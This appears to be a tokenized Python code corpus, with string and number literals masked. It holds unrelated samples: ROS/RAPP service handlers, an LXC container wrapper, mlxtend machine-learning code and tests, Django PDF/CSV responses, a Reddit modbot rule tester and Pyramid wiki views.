<EOL> return res <EOL> def tblAppsRobotsDeleteDataHandler ( self , req ) : <EOL> res = deleteDataSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblAppsRobotsUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesWriteDataHandler ( self , req ) : <EOL> res = writeDataSrvResponse ( ) <EOL> res = self . writeData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesDeleteDataHandler ( self , req ) : <EOL> res = deleteSrvResponse ( ) <EOL> res = self . deleteData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def tblUsersOntologyInstancesUpdateDataHandler ( self , req ) : <EOL> res = updateDataSrvResponse ( ) <EOL> res = self . updateData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def viewUsersRobotsAppsFetchDataHandler ( self , req ) : <EOL> res = fetchDataSrvResponse ( ) <EOL> res = self . fetchData ( req , "<STR_LIT>" ) <EOL> return res <EOL> def whatRappsCanRunDataHandler ( self , req ) : <EOL> res = whatRappsCanRunSrvResponse ( ) <EOL> res = self . whatRappsCanRun ( req , "<STR_LIT>" ) <EOL> return res </s>
<s> import os <EOL> import timeit <EOL> import rospkg <EOL> from os . path import join <EOL> __path__ = os . path . dirname ( os . path . realpath ( __file__ ) ) <EOL> from RappCloud import RappCloud <EOL> class RappInterfaceTest : <EOL> def __init__ ( self ) : <EOL> self . rappCloud = RappCloud ( ) <EOL> rospack = rospkg . RosPack ( ) <EOL> pkgDir = rospack . get_path ( '<STR_LIT>' ) <EOL> self . file_uri = join ( pkgDir , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . valid_results = { <EOL> '<STR_LIT>' : [ { '<STR_LIT:y>' : <NUM_LIT> , '<STR_LIT:x>' : <NUM_LIT> } ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT:error>' : '<STR_LIT>' <EOL> } <EOL> def execute ( self ) : <EOL> start_time = timeit . default_timer ( ) <EOL> response = self . rappCloud . qr_detection ( self . file_uri ) <EOL> end_time = timeit . default_timer ( ) <EOL> self . elapsed_time = end_time - start_time <EOL> return self . validate ( response ) <EOL> def validate ( self , response ) : <EOL> error = response [ '<STR_LIT:error>' ] <EOL> if error != "<STR_LIT>" : <EOL> return [ error , self . elapsed_time ] <EOL> return_data = response <EOL> if self . valid_results == return_data : <EOL> return [ True , self . elapsed_time ] <EOL> else : <EOL> return [ "<STR_LIT>" + str ( return_data ) , self . elapsed_time ] </s>
<s> from distutils . core import setup <EOL> from catkin_pkg . python_setup import generate_distutils_setup <EOL> setup_args = generate_distutils_setup ( <EOL> packages = [ '<STR_LIT>' ] , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } <EOL> ) <EOL> setup ( ** setup_args ) </s>
<s> """<STR_LIT>""" <EOL> CREATE_CONTAINER = '<STR_LIT>' <EOL> DESTROY_CONTAINER = '<STR_LIT>' <EOL> CONFIGURE_COMPONENT = '<STR_LIT>' <EOL> CONFIGURE_CONNECTION = '<STR_LIT>' <EOL> DATA_MESSAGE = '<STR_LIT>' <EOL> STATUS = '<STR_LIT>' <EOL> ERROR = '<STR_LIT>' <EOL> STATUS_INTERFACE = '<STR_LIT>' </s>
<s> import os <EOL> pjoin = os . path . join <EOL> from twisted . python import log <EOL> from rce . util . process import execute <EOL> _CONFIG_CGROUP = """<STR_LIT>""" <EOL> _CONFIG_CAP = """<STR_LIT>""" <EOL> _FSTAB_BASE = """<STR_LIT>""" <EOL> _FSTAB_BIND = """<STR_LIT>""" <EOL> class Container ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , reactor , rootfs , conf , hostname ) : <EOL> """<STR_LIT>""" <EOL> self . _reactor = reactor <EOL> self . _rootfs = rootfs <EOL> self . _conf = pjoin ( conf , '<STR_LIT>' ) <EOL> self . _fstab = pjoin ( conf , '<STR_LIT>' ) <EOL> self . _hostname = hostname <EOL> if not os . path . isabs ( conf ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if not os . path . isdir ( conf ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( conf ) ) <EOL> if os . path . exists ( self . _conf ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> "<STR_LIT>" . format ( conf ) ) <EOL> if os . path . exists ( self . _fstab ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> "<STR_LIT>" . format ( conf ) ) <EOL> self . _ifs = [ ] <EOL> self . _fstabExt = [ ] <EOL> def addNetworkInterface ( self , name , link = None , ip = None , up = None , down = None ) : <EOL> """<STR_LIT>""" <EOL> if up : <EOL> if not os . path . isabs ( up ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not os . path . isfile ( up ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not os . access ( up , os . X_OK ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if down : <EOL> if not os . path . isabs ( down ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not os . path . isfile ( down ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not os . access ( down , os . X_OK ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _ifs . append ( ( name , link , ip , up , down ) ) <EOL> def extendFstab ( self , src , fs , ro ) : <EOL> """<STR_LIT>""" <EOL> dst = pjoin ( self . _rootfs , fs ) <EOL> if not os . path . isabs ( src ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not os . path . exists ( src ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if not os . path . exists ( dst ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _fstabExt . append ( ( src , dst , ro ) ) <EOL> def _setupFiles ( self ) : <EOL> """<STR_LIT>""" <EOL> with open ( self . _conf , '<STR_LIT:w>' ) as f : <EOL> f . write ( '<STR_LIT>' . format ( self . _hostname ) ) <EOL> f . write ( '<STR_LIT:\n>' ) <EOL> f . write ( '<STR_LIT>' . format ( self . _rootfs ) ) <EOL> f . write ( '<STR_LIT>' . format ( self . _fstab ) ) <EOL> for name , link , ip , up , down in self . _ifs : <EOL> f . write ( '<STR_LIT:\n>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . write ( '<STR_LIT>' . format ( name ) ) <EOL> if link : <EOL> f . write ( '<STR_LIT>' . format ( link ) ) <EOL> if ip : <EOL> f . write ( '<STR_LIT>' . format ( ip ) ) <EOL> if up : <EOL> f . write ( '<STR_LIT>' . format ( up ) ) <EOL> if down : <EOL> f . write ( '<STR_LIT>' . format ( down ) ) <EOL> f . write ( _CONFIG_CGROUP ) <EOL> with open ( self . _fstab , '<STR_LIT:w>' ) as f : <EOL> f . write ( _FSTAB_BASE . format ( proc = pjoin ( self . _rootfs , '<STR_LIT>' ) , <EOL> devpts = pjoin ( self . _rootfs , '<STR_LIT>' ) , <EOL> sysfs = pjoin ( self . _rootfs , '<STR_LIT>' ) ) ) <EOL> for src , dst , ro in self . _fstabExt : <EOL> f . write ( _FSTAB_BIND . format ( srcDir = src , dstDir = dst , <EOL> ro = '<STR_LIT>' if ro else '<STR_LIT>' ) ) <EOL> def start ( self , name ) : <EOL> """<STR_LIT>""" <EOL> self . _setupFiles ( ) <EOL> log . msg ( "<STR_LIT>" . format ( name ) ) <EOL> return execute ( ( '<STR_LIT>' , '<STR_LIT>' , name , '<STR_LIT>' , self . _conf , <EOL> '<STR_LIT>' ) , reactor = self . _reactor ) <EOL> def stop ( self , name ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( "<STR_LIT>" . format ( name ) ) <EOL> return execute ( ( '<STR_LIT>' , '<STR_LIT>' , name ) , reactor = self . _reactor ) </s>
<s> from . perceptron import Perceptron <EOL> from . adaline import Adaline <EOL> from . logistic_regression import LogisticRegression <EOL> from . softmax_regression import SoftmaxRegression <EOL> from . neuralnet_mlp import NeuralNetMLP <EOL> from . ensemble_vote import EnsembleVoteClassifier <EOL> from . stacking_classification import StackingClassifier <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> from mlxtend . data import iris_data <EOL> from mlxtend . data import wine_data <EOL> from mlxtend . data import autompg_data <EOL> from mlxtend . data import mnist_data <EOL> def test_import_wine_data ( ) : <EOL> X , y = wine_data ( ) <EOL> assert ( X . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( X . shape [ <NUM_LIT:1> ] == <NUM_LIT> ) <EOL> assert ( y . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> def test_import_iris_data ( ) : <EOL> X , y = iris_data ( ) <EOL> assert ( X . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( X . shape [ <NUM_LIT:1> ] == <NUM_LIT:4> ) <EOL> assert ( y . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> def test_import_autompg_data ( ) : <EOL> X , y = autompg_data ( ) <EOL> assert ( X . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) <EOL> assert ( X . shape [ <NUM_LIT:1> ] == <NUM_LIT:8> ) <EOL> assert ( y . shape [ <NUM_LIT:0> ] == <NUM_LIT> ) </s>
<s> import numpy as np <EOL> import scipy as sp <EOL> import scipy . stats <EOL> import sys <EOL> from copy import deepcopy <EOL> from itertools import combinations <EOL> from collections import deque <EOL> from sklearn . metrics import get_scorer <EOL> from sklearn . base import clone <EOL> from sklearn . base import BaseEstimator <EOL> from sklearn . base import MetaEstimatorMixin <EOL> from sklearn . cross_validation import cross_val_score <EOL> from . . externals . name_estimators import _name_estimators <EOL> class SequentialFeatureSelector ( BaseEstimator , MetaEstimatorMixin ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , estimator , k_features , <EOL> forward = True , floating = False , <EOL> print_progress = True , scoring = '<STR_LIT>' , <EOL> cv = <NUM_LIT:5> , skip_if_stuck = True , n_jobs = <NUM_LIT:1> , <EOL> pre_dispatch = '<STR_LIT>' ) : <EOL> self . estimator = estimator <EOL> self . k_features = k_features <EOL> self . forward = forward <EOL> self . floating = floating <EOL> self . pre_dispatch = pre_dispatch <EOL> self . scoring = scoring <EOL> self . scorer = get_scorer ( scoring ) <EOL> self . skip_if_stuck = skip_if_stuck <EOL> self . cv = cv <EOL> self . print_progress = print_progress <EOL> self . n_jobs = n_jobs <EOL> self . named_est = { key : value for key , value in <EOL> _name_estimators ( [ self . estimator ] ) } <EOL> def fit ( self , X , y ) : <EOL> self . est_ = clone ( self . estimator ) <EOL> if X . shape [ <NUM_LIT:1> ] < self . k_features : <EOL> raise AttributeError ( '<STR_LIT>' ) <EOL> if self . skip_if_stuck : <EOL> sdq = deque ( maxlen = <NUM_LIT:4> ) <EOL> else : <EOL> sdq = deque ( maxlen = <NUM_LIT:0> ) <EOL> self . subsets_ = { } <EOL> orig_set = set ( range ( X . shape [ <NUM_LIT:1> ] ) ) <EOL> if self . forward : <EOL> k_idx = ( ) <EOL> k = <NUM_LIT:0> <EOL> else : <EOL> k_idx = tuple ( range ( X . shape [ <NUM_LIT:1> ] ) ) <EOL> k = len ( k_idx ) <EOL> k_score = self . _calc_score ( X , y , k_idx ) <EOL> self . subsets_ [ k ] = { '<STR_LIT>' : k_idx , <EOL> '<STR_LIT>' : k_score , <EOL> '<STR_LIT>' : k_score . mean ( ) } <EOL> while k != self . k_features : <EOL> prev_subset = set ( k_idx ) <EOL> if self . forward : <EOL> k_idx , k_score , cv_scores = self . _inclusion ( orig_set = orig_set , <EOL> subset = prev_subset , <EOL> X = X , y = y ) <EOL> else : <EOL> k_idx , k_score , cv_scores = self . _exclusion ( feature_set = prev_subset , X = X , y = y ) <EOL> if self . floating and not self . _is_stuck ( sdq ) : <EOL> ( new_feature , ) = set ( k_idx ) ^ prev_subset <EOL> if self . forward : <EOL> k_idx_c , k_score_c , cv_scores_c = self . _exclusion ( feature_set = k_idx , <EOL> fixed_feature = new_feature , <EOL> X = X , y = y ) <EOL> else : <EOL> k_idx_c , k_score_c , cv_scores_c = self . _inclusion ( orig_set = orig_set - { new_feature } , <EOL> subset = set ( k_idx ) , <EOL> X = X , y = y ) <EOL> if k_score_c and k_score_c > k_score : <EOL> k_idx , k_score , cv_scores = k_idx_c , k_score_c , cv_scores_c <EOL> k = len ( k_idx ) <EOL> if k not in self . subsets_ or ( self . subsets_ [ k ] [ '<STR_LIT>' ] > <EOL> k_score ) : <EOL> self . subsets_ [ k ] = { '<STR_LIT>' : k_idx , <EOL> '<STR_LIT>' : cv_scores , <EOL> '<STR_LIT>' : k_score } <EOL> sdq . append ( k_idx ) <EOL> if self . print_progress : <EOL> sys . stderr . write ( '<STR_LIT>' % ( <EOL> len ( k_idx ) , self . k_features ) ) <EOL> sys . stderr . flush ( ) <EOL> self . k_feature_idx_ = k_idx <EOL> self . k_score_ = k_score <EOL> self . subsets_plus_ = dict ( ) <EOL> return self <EOL> def _is_stuck ( self , sdq ) : <EOL> stuck = False <EOL> if len ( sdq ) == <NUM_LIT:4> and ( sdq [ <NUM_LIT:0> ] == sdq [ <NUM_LIT:2> ] or sdq [ <NUM_LIT:1> ] == sdq [ <NUM_LIT:3> ] ) : <EOL> stuck = True <EOL> return stuck <EOL> def _calc_score ( self , X , y , indices ) : <EOL> if self . cv : <EOL> scores = cross_val_score ( self . est_ , <EOL> X [ : , indices ] , y , <EOL> cv = self . cv , <EOL> scoring = self . scorer , <EOL> n_jobs = self . n_jobs , <EOL> pre_dispatch = self . pre_dispatch ) <EOL> else : <EOL> self . est_ . fit ( X [ : , indices ] , y ) <EOL> scores = np . array ( [ self . scorer ( self . est_ , X [ : , indices ] , y ) ] ) <EOL> return scores <EOL> def _inclusion ( self , orig_set , subset , X , y ) : <EOL> all_avg_scores = [ ] <EOL> all_cv_scores = [ ] <EOL> all_subsets = [ ] <EOL> res = ( None , None , None ) <EOL> remaining = orig_set - subset <EOL> if remaining : <EOL> for feature in remaining : <EOL> new_subset = tuple ( subset | { feature } ) <EOL> cv_scores = self . _calc_score ( X , y , new_subset ) <EOL> all_avg_scores . append ( cv_scores . mean ( ) ) <EOL> all_cv_scores . append ( cv_scores ) <EOL> all_subsets . append ( new_subset ) <EOL> best = np . argmax ( all_avg_scores ) <EOL> res = ( all_subsets [ best ] , <EOL> all_avg_scores [ best ] , <EOL> all_cv_scores [ best ] ) <EOL> return res <EOL> def _exclusion ( self , feature_set , X , y , fixed_feature = None ) : <EOL> n = len ( feature_set ) <EOL> res = ( None , None , None ) <EOL> if n > <NUM_LIT:1> : <EOL> all_avg_scores = [ ] <EOL> all_cv_scores = [ ] <EOL> all_subsets = [ ] <EOL> for p in combinations ( feature_set , r = n - <NUM_LIT:1> ) : <EOL> if fixed_feature and fixed_feature not in set ( p ) : <EOL> continue <EOL> cv_scores = self . _calc_score ( X , y , p ) <EOL> all_avg_scores . append ( cv_scores . mean ( ) ) <EOL> all_cv_scores . append ( cv_scores ) <EOL> all_subsets . append ( p ) <EOL> best = np . argmax ( all_avg_scores ) <EOL> res = ( all_subsets [ best ] , <EOL> all_avg_scores [ best ] , <EOL> all_cv_scores [ best ] ) <EOL> return res <EOL> def transform ( self , X ) : <EOL> return X [ : , self . k_feature_idx_ ] <EOL> def fit_transform ( self , X , y ) : <EOL> self . fit ( X , y ) <EOL> return self . transform ( X ) <EOL> def get_metric_dict ( self , confidence_interval = <NUM_LIT> ) : <EOL> fdict = deepcopy ( self . subsets_ ) <EOL> for k in fdict : <EOL> std_dev = np . std ( self . subsets_ [ k ] [ '<STR_LIT>' ] ) <EOL> bound , std_err = self . _calc_confidence ( <EOL> self . subsets_ [ k ] [ '<STR_LIT>' ] , <EOL> confidence = confidence_interval ) <EOL> fdict [ k ] [ '<STR_LIT>' ] = bound <EOL> fdict [ k ] [ '<STR_LIT>' ] = std_dev <EOL> fdict [ k ] [ '<STR_LIT>' ] = std_err <EOL> return fdict <EOL> def _calc_confidence ( self , ary , confidence = <NUM_LIT> ) : <EOL> std_err = scipy . stats . sem ( ary ) <EOL> bound = std_err * sp . stats . t . _ppf ( ( <NUM_LIT:1> + confidence ) / <NUM_LIT> , len ( ary ) ) <EOL> return bound , std_err </s>
<s> from sklearn . linear_model import LinearRegression <EOL> from scipy . stats import pearsonr <EOL> import matplotlib . pyplot as plt <EOL> import numpy as np <EOL> def plot_linear_regression ( X , y , model = LinearRegression ( ) , <EOL> corr_func = '<STR_LIT>' , <EOL> scattercolor = '<STR_LIT>' , fit_style = '<STR_LIT>' , legend = True , <EOL> xlim = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( X , list ) : <EOL> X = np . asarray ( X , dtype = np . float ) <EOL> if isinstance ( y , list ) : <EOL> y = np . asarray ( y , dtype = np . float ) <EOL> if len ( X . shape ) == <NUM_LIT:1> : <EOL> X = X [ : , np . newaxis ] <EOL> model . fit ( X , y ) <EOL> plt . scatter ( X , y , c = scattercolor ) <EOL> if xlim == '<STR_LIT>' : <EOL> x_min , x_max = X [ : , <NUM_LIT:0> ] . min ( ) , X [ : , <NUM_LIT:0> ] . max ( ) <EOL> x_min -= <NUM_LIT> * x_min <EOL> x_max += <NUM_LIT> * x_max <EOL> else : <EOL> x_min , x_max = xlim <EOL> y_min = model . predict ( x_min ) <EOL> y_max = model . predict ( x_max ) <EOL> plt . plot ( [ x_min , x_max ] , [ y_min , y_max ] , fit_style , lw = <NUM_LIT:1> ) <EOL> if corr_func == '<STR_LIT>' : <EOL> corr_func = pearsonr <EOL> corr_coeff , p = corr_func ( X [ : , <NUM_LIT:0> ] , y ) <EOL> intercept , slope = model . intercept_ , model . coef_ [ <NUM_LIT:0> ] <EOL> if legend : <EOL> leg_text = '<STR_LIT>' % ( intercept , slope ) <EOL> if corr_func : <EOL> leg_text += '<STR_LIT>' % corr_coeff <EOL> plt . legend ( [ leg_text ] , loc = '<STR_LIT>' ) <EOL> regression_fit = ( intercept , slope , corr_coeff ) <EOL> return regression_fit </s>
<s> from mlxtend . tf_regressor import TfLinearRegression <EOL> from mlxtend . data import boston_housing_data <EOL> import numpy as np <EOL> from numpy . testing import assert_almost_equal <EOL> np . random . seed ( <NUM_LIT:1> ) <EOL> X = np . array ( [ np . random . normal ( <NUM_LIT:1.0> , <NUM_LIT> ) for i in range ( <NUM_LIT:100> ) ] ) <EOL> y = np . array ( [ x1 * <NUM_LIT:0.1> + <NUM_LIT:0.1> + np . random . normal ( <NUM_LIT:0.0> , <NUM_LIT> ) for x1 in X ] ) <EOL> X = X [ : , np . newaxis ] <EOL> X2 = np . hstack ( ( X , X ) ) <EOL> def test_univariate_univariate_gradient_descent ( ) : <EOL> gd_lr = TfLinearRegression ( eta = <NUM_LIT> , <EOL> epochs = <NUM_LIT> , <EOL> random_seed = <NUM_LIT:1> , <EOL> print_progress = <NUM_LIT:0> ) <EOL> gd_lr . fit ( X , y ) <EOL> assert_almost_equal ( gd_lr . bias_ , np . array ( [ <NUM_LIT> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( gd_lr . weights_ , np . array ( [ <NUM_LIT> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( gd_lr . predict ( X ) , y , decimal = <NUM_LIT:1> ) <EOL> def test_multivariate_gradient_descent ( ) : <EOL> gd_lr = TfLinearRegression ( eta = <NUM_LIT> , <EOL> epochs = <NUM_LIT> , <EOL> random_seed = <NUM_LIT:1> , <EOL> print_progress = <NUM_LIT:0> ) <EOL> gd_lr . fit ( X2 , y ) <EOL> assert_almost_equal ( gd_lr . predict ( X2 ) , y , decimal = <NUM_LIT:1> ) <EOL> assert_almost_equal ( gd_lr . bias_ , np . array ( [ <NUM_LIT:0.1> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( gd_lr . weights_ , np . array ( [ - <NUM_LIT> , <NUM_LIT> ] ) , decimal = <NUM_LIT:2> ) </s>
<s> from django . template . response import TemplateResponse <EOL> from enhanced_cbv . utils import fetch_resources , UnicodeWriter <EOL> try : <EOL> from cStringIO import StringIO <EOL> except ImportError : <EOL> from StringIO import StringIO <EOL> class PDFTemplateResponse ( TemplateResponse ) : <EOL> import logging <EOL> class PisaNullHandler ( logging . Handler ) : <EOL> def emit ( self , record ) : <EOL> pass <EOL> logging . getLogger ( "<STR_LIT>" ) . addHandler ( PisaNullHandler ( ) ) <EOL> def __init__ ( self , request , template , context = None , <EOL> mimetype = '<STR_LIT>' , status = None , content_type = None , <EOL> current_app = None , filename = None ) : <EOL> """<STR_LIT>""" <EOL> self . filename = filename <EOL> super ( PDFTemplateResponse , self ) . __init__ ( request , <EOL> template , context , mimetype , status , content_type ) <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> import xhtml2pdf . pisa as pisa <EOL> if not self . _is_rendered : <EOL> buffer = StringIO ( ) <EOL> pisa . CreatePDF ( self . rendered_content , buffer , <EOL> link_callback = fetch_resources ) <EOL> pdf = buffer . getvalue ( ) <EOL> buffer . close ( ) <EOL> self . write ( pdf ) <EOL> self [ '<STR_LIT>' ] = '<STR_LIT>' % ( <EOL> self . filename , ) <EOL> self . _is_rendered = True <EOL> for post_callback in self . _post_render_callbacks : <EOL> post_callback ( self ) <EOL> return self <EOL> class CSVTemplateResponse ( TemplateResponse ) : <EOL> def __init__ ( self , request , template , context = None , <EOL> content_type = '<STR_LIT>' , status = None , <EOL> current_app = None , using = None , filename = None , rows = None , <EOL> writer_kwargs = None ) : <EOL> """<STR_LIT>""" <EOL> self . filename = filename <EOL> self . rows = rows <EOL> if writer_kwargs : <EOL> self . writer_kwargs = writer_kwargs <EOL> else : <EOL> self . writer_kwargs = { } <EOL> super ( CSVTemplateResponse , self ) . __init__ ( <EOL> request , template , context , content_type , status , using ) <EOL> def render ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . _is_rendered : <EOL> buffer = StringIO ( ) <EOL> writer = UnicodeWriter ( buffer , ** self . writer_kwargs ) <EOL> for row in self . rows : <EOL> writer . writerow ( [ unicode ( value ) . encode ( '<STR_LIT:utf-8>' ) for value <EOL> in row ] ) <EOL> csv = buffer . getvalue ( ) <EOL> buffer . close ( ) <EOL> self . write ( csv ) <EOL> self [ '<STR_LIT>' ] = '<STR_LIT>' % ( <EOL> self . filename , ) <EOL> self . _is_rendered = True <EOL> for post_callback in self . _post_render_callbacks : <EOL> post_callback ( self ) <EOL> return self </s>
<s> from pprint import pprint <EOL> from rules import RuleHandler <EOL> import argparse <EOL> import logging <EOL> import modbot <EOL> import praw <EOL> import sys <EOL> def myperformaction ( thing , action , rule , matches ) : <EOL> logging . info ( "<STR_LIT>" % action ) <EOL> modbot . performaction = myperformaction <EOL> def testrule ( rule , thing ) : <EOL> rh = RuleHandler ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> rule = rh . _read_rule ( rule ) <EOL> return modbot . matchrules ( thing , [ rule ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT:url>' ) <EOL> args = parser . parse_args ( ) <EOL> r = praw . Reddit ( '<STR_LIT>' % ( modbot . NAME , modbot . VERSION ) ) <EOL> logging . basicConfig ( level = logging . DEBUG , <EOL> format = "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> if args . comment : <EOL> thing = r . request_json ( args . url ) [ <NUM_LIT:2> ] [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> else : <EOL> thing = r . get_submission ( args . url ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> if testrule ( args . rule , thing ) : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> import re <EOL> from docutils . core import publish_parts <EOL> from pyramid . httpexceptions import ( <EOL> HTTPFound , <EOL> HTTPNotFound , <EOL> ) <EOL> from pyramid . view import ( <EOL> view_config , <EOL> forbidden_view_config , <EOL> ) <EOL> from pyramid . security import ( <EOL> remember , <EOL> forget , <EOL> authenticated_userid , <EOL> ) <EOL> from . security import USERS <EOL> from . models import ( <EOL> DBSession , <EOL> Page , <EOL> ) <EOL> wikiwords = re . compile ( r"<STR_LIT>" ) <EOL> @ view_config ( route_name = '<STR_LIT>' ) <EOL> def view_wiki ( request ) : <EOL> return HTTPFound ( location = request . route_url ( '<STR_LIT>' , <EOL> pagename = '<STR_LIT>' ) ) <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' , <EOL> permission = '<STR_LIT>' ) <EOL> def view_page ( request ) : <EOL> pagename = request . matchdict [ '<STR_LIT>' ] <EOL> page = DBSession . query ( Page ) . filter_by ( name = pagename ) . first ( ) <EOL> if page is None : <EOL> return HTTPNotFound ( '<STR_LIT>' ) <EOL> def check ( match ) : <EOL> word = match . group ( <NUM_LIT:1> ) <EOL> exists = DBSession . query ( Page ) . filter_by ( name = word ) . all ( ) <EOL> if exists : <EOL> view_url = request . route_url ( '<STR_LIT>' , pagename = word ) <EOL> return '<STR_LIT>' % ( view_url , word ) <EOL> else : <EOL> add_url = request . route_url ( '<STR_LIT>' , pagename = word ) <EOL> return '<STR_LIT>' % ( add_url , word ) <EOL> content = publish_parts ( page . data , writer_name = '<STR_LIT:html>' ) [ '<STR_LIT>' ] <EOL> content = wikiwords . sub ( check , content ) <EOL> try : <EOL> edit_url = request . route_url ( '<STR_LIT>' , pagename = pagename ) <EOL> except Exception : <EOL> edit_url = '<STR_LIT>' <EOL> return dict ( page = page , content = content , edit_url = edit_url , <EOL> logged_in = authenticated_userid ( request ) ) <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> def add_page ( request ) : <EOL> pagename = request . matchdict [ '<STR_LIT>' ] <EOL> if '<STR_LIT>' in request . params : <EOL> body = request . params [ '<STR_LIT:body>' ] <EOL> page = Page ( pagename , body ) <EOL> DBSession . add ( page ) <EOL> return HTTPFound ( location = request . route_url ( '<STR_LIT>' , <EOL> pagename = pagename ) ) <EOL> save_url = request . route_url ( '<STR_LIT>' , pagename = pagename ) <EOL> page = Page ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return dict ( page = page , save_url = save_url , <EOL> logged_in = authenticated_userid ( request ) ) <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> def edit_page ( request ) : <EOL> pagename = request . matchdict [ '<STR_LIT>' ] <EOL> page = DBSession . query ( Page ) . filter_by ( name = pagename ) . one ( ) <EOL> if '<STR_LIT>' in request . params : <EOL> page . data = request . params [ '<STR_LIT:body>' ] <EOL> DBSession . add ( page ) <EOL> return HTTPFound ( location = request . route_url ( '<STR_LIT>' , <EOL> pagename = pagename ) ) <EOL> return dict ( <EOL> page = page , <EOL> save_url = request . route_url ( '<STR_LIT>' , pagename = pagename ) , <EOL> logged_in = authenticated_userid ( request ) <EOL> ) <EOL> @ view_config ( route_name = '<STR_LIT>' , renderer = '<STR_LIT>' ) <EOL> @ forbidden_view_config ( renderer = '<STR_LIT>' ) <EOL> def login ( request ) : <EOL> login_url = request . route_url ( '<STR_LIT>' ) <EOL> referrer = request . url <EOL> if referrer == login_url : <EOL> referrer = '<STR_LIT:/>' <EOL> came_from = request . params . get ( '<STR_LIT>' , referrer ) <EOL> message = '<STR_LIT>' <EOL> login = '<STR_LIT>' <EOL> password = '<STR_LIT>' <EOL> if '<STR_LIT>' in request . params : <EOL> login = request . params [ '<STR_LIT>' ] <EOL> password = request . params [ '<STR_LIT:password>' ] <EOL> if USERS . get ( login ) == password : <EOL> headers = remember ( request , login ) <EOL> return HTTPFound ( location = came_from , <EOL> headers = headers ) <EOL> message = '<STR_LIT>' <EOL> return dict ( <EOL> message = message , <EOL> url = request . application_url + '<STR_LIT>' , <EOL> came_from = came_from , <EOL> login = login , <EOL> password = password , <EOL> ) <EOL> @ view_config ( route_name = '<STR_LIT>' ) <EOL> def logout ( request ) : <EOL> headers = forget ( request ) <EOL> return HTTPFound ( location = request . route_url ( '<STR_LIT>' ) , <EOL> headers = headers ) </s>
